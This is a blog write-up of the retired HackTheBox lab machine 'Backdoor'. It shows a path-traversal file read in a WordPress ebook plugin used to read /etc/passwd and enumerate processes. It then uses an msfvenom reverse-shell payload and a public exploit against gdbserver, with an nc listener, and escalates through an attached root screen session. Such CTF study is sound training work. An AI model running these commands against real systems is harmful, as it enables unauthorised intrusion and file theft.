HTB: Backdoor

Posted on 25 Apr 2022 in security • 2 min read


This is a writeup about a retired HacktheBox machine: Backdoor publish on November 20, 2021 by hkabubaker17. This box is rated as an easy machine. It implies a wordpress plugin, a LFI, a gdbserver and a screen process.



Let us start as always by a nmap scan. Only three TCP ports are open: 22 (SSH), 80 (HTTP) and 1337 (we don't know what is running there).

# Nmap 7.92 scan initiated Tue Jan  4 08:45:39 2022 as: nmap -p- -sSV -oN
Nmap scan report for
Host is up (0.013s latency).
Not shown: 65532 closed tcp ports (reset)
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
1337/tcp open  waste?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Tue Jan  4 08:46:11 2022 -- 1 IP address (1 host up) scanned in 31.95 seconds

The HTTP port is a basic WordPress website.

WordPress homepage

Looking at the installed plugin we found that ebook-download is available:

ebook-download plugin

This WordPress plugin is vulnerable to a LFI that we can exploit to retrieve files on the box.

└─$ curl http://backdoor.htb//wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false

We want to find which process is running on port 1337. We write a quick python script that get the Max PID and list the process by PID.

import requests

r = requests.get('http://backdoor.htb//wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/sys/kernel/pid_max')
maxpid= int(r.text[132:-31])

while i<maxpid:
    r = requests.get('http://backdoor.htb//wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../proc/'+str(i)+'/cmdline')
    if r.text[102+3*len(str(i)):112+3*len(str(i))]!='<script>wi':

We finally discover that the 1337 process is a gdbserver. We also notice a sceen session running as root.

└─$ python3
/bin/sh-cwhile true;do su user -c "cd /home/user;gdbserver --once /bin/true;"; done
/bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done

gdbserver is vulnerable to a RCE. We generate the reverse shell, start a listener and launch the exploit. Getting a shell as user allowing use to grab the user flag.

└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=4444 PrependFork=true -o rev.bin

─$ python3 50539 backdoor.htb:1337 rev.bin

└─$ nc -nlvp 4444

listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 42684
uid=1000(user) gid=1000(user) groups=1000(user)
cat user.txt


We create the .ssh directory and put our public SSH key in the authorized_keys file in order to be more comfortable.

Remember that screen process we enumerated before?

/bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec screen -dmS root \;; done

We can verify that the session is still running:

user@Backdoor:~$ screen -ls root/root
There is a suitable screen on:
        3694.root       (01/05/2022 09:38:33 AM)        (Multi, detached)
1 Socket in /run/screen/S-root.

And we attach it getting the root flag:

user@Backdoor:~$ screen -x root/root

root@Backdoor:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Backdoor:~# cat root.txt

Wrapping up

A quick an easy box, perfect for me as it has been a while since my last box.